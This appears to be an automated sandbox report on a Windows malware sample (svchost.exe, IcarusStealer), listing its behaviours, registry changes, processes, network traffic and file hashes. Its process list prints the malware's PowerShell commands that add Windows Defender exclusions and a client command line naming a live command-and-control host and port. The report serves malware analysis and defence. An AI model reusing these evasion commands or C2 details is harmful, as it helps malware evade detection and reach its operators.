Analysis Overview
SHA256
ade93fc6c27fa1b57d864ebbcea4cec99bfb8556115496051bc8a10b0efde04d
Threat Level: Known bad
The file svchost.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Enumerates connected drives
Suspicious use of SetThreadContext
Unsigned PE
Enumerates physical storage devices
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-09 15:28
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 15:28
Reported
2024-03-09 15:30
Platform
win10v2004-20240226-en
Max time kernel
7s
Max time network
62s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Start.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3368 set thread context of 220 | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{506CF92D-2348-44C8-A7CA-5CFD619112B9} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Start.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Start.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Start.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Start.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\Start.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Users\Admin\AppData\Local\Temp\Start.exe
C:\Users\Admin\AppData\Local\Temp\Start.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 17.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
Files
memory/3368-0-0x0000000075150000-0x0000000075900000-memory.dmp
memory/3368-1-0x0000000000590000-0x0000000000612000-memory.dmp
memory/3368-2-0x00000000054C0000-0x000000000555C000-memory.dmp
memory/3368-3-0x0000000005560000-0x00000000055F2000-memory.dmp
memory/3368-4-0x00000000071C0000-0x0000000007764000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.cmdline
| MD5 | 80e5e8cec2758009460e985a799ca6b4 |
| SHA1 | 89fc0e1ac64a3d23ee2e83086957e63dd5b7cd2e |
| SHA256 | ecedde26d1fb9ab58e2e3b8cfbb41514cd629c0e531049bc0c1b0ee402465595 |
| SHA512 | becc050e4a07eec5710f59e371bd8653b0274f84e9323ac7509f6895fba6ad69c082deae3bd7ed68428a8b1487a016f3e169c846836c88c4c47eb52d3db110a2 |
\??\c:\Users\Admin\AppData\Local\Temp\20elnnae\20elnnae.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCADAA17DA99B940328E167AEB45BAC584.TMP
| MD5 | 810535a8ae563d6aa53635a1bb1206ff |
| SHA1 | f5ba39f1a455eb61efe5022b524892249ee75dce |
| SHA256 | 7f2c2a29a5f1c0d994fa4c2fccc11a8f3f5f5d4d97ada18aea94971664c8992f |
| SHA512 | 5662b39b29d33bff2e8de4cf3878a6e58b7a163cc93311f4c82f03e73b239a76bb9064ed0c4a6d01cceb858663462345cae78999cfa3668ef975cf85dfff138d |
C:\Users\Admin\AppData\Local\Temp\RES75FB.tmp
| MD5 | c94fa213d51f3046b4fee71f216be2fe |
| SHA1 | d4b4e1cd9d16184d2ff5d687c13f3915f5d97e51 |
| SHA256 | 52e15efb7ab936117b0424adf8df1ed4a0d346746097de7d525752d1cb455c0d |
| SHA512 | 07963f3c03c6de7759d2043fb5b62313a0c056de8570dc1ae636a4f61f3c3c8f74279be90d941c485df1a5972a000921b1083a2b2ec5f303e6169d8bf158f8c8 |
memory/220-17-0x0000000000400000-0x0000000000424000-memory.dmp
memory/220-18-0x0000000075150000-0x0000000075900000-memory.dmp
memory/220-19-0x0000000005580000-0x0000000005590000-memory.dmp
memory/3368-21-0x0000000075150000-0x0000000075900000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Start.exe
| MD5 | 65553b8955e11c0813ae56b6502071fe |
| SHA1 | 48ca68eb75a01f6a5e4329addb9b5b4b7bf98b4c |
| SHA256 | 647fffa6f573e913ec1f26b43fcf731e48e2d307f45f023c66d49d71240623f8 |
| SHA512 | ca9403803be7c0b07c39a12faca0aa3043507c1adae4bafb570868a9e6f8548786222e3c3d4c8724ffec10011035fa354318857864a4b4c97701d5d9650ebef8 |
memory/544-25-0x0000000000DC0000-0x0000000000DC8000-memory.dmp
memory/2896-26-0x0000000003360000-0x0000000003396000-memory.dmp
memory/544-28-0x00007FFE86B90000-0x00007FFE87651000-memory.dmp
memory/3880-29-0x0000000004530000-0x0000000004540000-memory.dmp
memory/2896-27-0x0000000005A80000-0x00000000060A8000-memory.dmp
memory/2896-30-0x0000000075150000-0x0000000075900000-memory.dmp
memory/2896-31-0x0000000005440000-0x0000000005450000-memory.dmp
memory/3880-32-0x0000000004530000-0x0000000004540000-memory.dmp
memory/2896-33-0x0000000005440000-0x0000000005450000-memory.dmp
memory/3880-34-0x0000000075150000-0x0000000075900000-memory.dmp
memory/2896-35-0x00000000059C0000-0x00000000059E2000-memory.dmp
memory/3880-36-0x00000000053F0000-0x0000000005456000-memory.dmp
memory/3880-37-0x0000000005460000-0x00000000054C6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_12weuq1l.24h.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3880-56-0x00000000054D0000-0x0000000005824000-memory.dmp
memory/2896-59-0x0000000006960000-0x000000000697E000-memory.dmp
memory/2896-60-0x0000000006A10000-0x0000000006A5C000-memory.dmp
memory/3880-61-0x0000000004530000-0x0000000004540000-memory.dmp
memory/3880-66-0x000000007F770000-0x000000007F780000-memory.dmp
memory/3880-68-0x00000000701D0000-0x000000007021C000-memory.dmp
memory/3880-67-0x0000000006A40000-0x0000000006A72000-memory.dmp
memory/2896-84-0x00000000701D0000-0x000000007021C000-memory.dmp
memory/4276-83-0x000001717E540000-0x000001717E560000-memory.dmp
memory/3880-82-0x0000000006A80000-0x0000000006B23000-memory.dmp
memory/3880-80-0x0000000006060000-0x000000000607E000-memory.dmp
memory/2896-70-0x000000007EE90000-0x000000007EEA0000-memory.dmp
memory/4276-87-0x000001717E8C0000-0x000001717E8E0000-memory.dmp
memory/800-85-0x0000000003680000-0x0000000003681000-memory.dmp
memory/4276-98-0x000001717D7D0000-0x000001717D7F0000-memory.dmp
memory/3880-108-0x0000000007420000-0x0000000007A9A000-memory.dmp
memory/3880-109-0x0000000006DE0000-0x0000000006DFA000-memory.dmp
memory/220-110-0x0000000075150000-0x0000000075900000-memory.dmp
memory/3880-111-0x0000000006E60000-0x0000000006E6A000-memory.dmp
memory/3880-112-0x0000000007050000-0x00000000070E6000-memory.dmp
memory/2896-113-0x0000000007E90000-0x0000000007EA1000-memory.dmp
memory/3880-114-0x0000000007010000-0x000000000701E000-memory.dmp
memory/3880-115-0x0000000007020000-0x0000000007034000-memory.dmp
memory/3880-116-0x0000000007110000-0x000000000712A000-memory.dmp
memory/2896-117-0x0000000007FB0000-0x0000000007FB8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 85f7b21f78ffcce8f30b0589ae6e1578 |
| SHA1 | 14654f7fbc30e5e58d9bb6fa57360d3458fdc484 |
| SHA256 | e1365c3babc0f5f8487ad855a43970d8dba206eb3fc6b01ab9132a5c5813629f |
| SHA512 | 11ec10dc0eb87ea219b905f079c407eba390ec9b2c0399cb3f6e2014a0db2ac88c673b5d8a9b616338a3bdc4d2ed1dde432bf2fdae207210eca31dbcce4e15c1 |
memory/3880-123-0x0000000075150000-0x0000000075900000-memory.dmp
memory/2896-124-0x0000000075150000-0x0000000075900000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\1HCECE5V\microsoft.windows[1].xml
| MD5 | 6583a2f89cc3c90f77ffa922acf7ee63 |
| SHA1 | eccd205c1bb4764f160e86cfd0d860976c32708f |
| SHA256 | 34cbdb325cf0420e4bfbc19da431b639890b153b6ac0635ce79ba37ffc677ac2 |
| SHA512 | 0c7daec9157074607177f75d7ccf190027d9e1830d832cbf16426bfcf221258db4fba74ee35f20c85a9bd6022a1db0409a2f3ec84ecc7317142cf9759eead021 |
memory/4084-132-0x00000211C4730000-0x00000211C4750000-memory.dmp
memory/4084-134-0x00000211C46F0000-0x00000211C4710000-memory.dmp
memory/4084-137-0x00000211C4D00000-0x00000211C4D20000-memory.dmp
memory/3004-153-0x0000021F46E00000-0x0000021F46E20000-memory.dmp
memory/3004-157-0x0000021F46DC0000-0x0000021F46DE0000-memory.dmp
memory/3004-159-0x0000021F471E0000-0x0000021F47200000-memory.dmp
memory/220-167-0x0000000005580000-0x0000000005590000-memory.dmp
memory/544-168-0x00007FFE86B90000-0x00007FFE87651000-memory.dmp
memory/4724-169-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-171-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-170-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-175-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-176-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-177-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-178-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-179-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-180-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/4724-181-0x0000014FC7560000-0x0000014FC7561000-memory.dmp
memory/712-189-0x000002A77ECD0000-0x000002A77ECF0000-memory.dmp
memory/712-191-0x000002A77EC90000-0x000002A77ECB0000-memory.dmp
memory/712-193-0x000002A77F0B0000-0x000002A77F0D0000-memory.dmp
memory/5192-210-0x0000015CD6EB0000-0x0000015CD6ED0000-memory.dmp
memory/5192-212-0x0000015CD6E70000-0x0000015CD6E90000-memory.dmp
memory/5192-214-0x0000015CD7480000-0x0000015CD74A0000-memory.dmp
memory/5624-231-0x000002006C320000-0x000002006C340000-memory.dmp
memory/5624-233-0x000002006BFD0000-0x000002006BFF0000-memory.dmp
memory/5624-235-0x000002006C6F0000-0x000002006C710000-memory.dmp
memory/6000-252-0x000001E2A9860000-0x000001E2A9880000-memory.dmp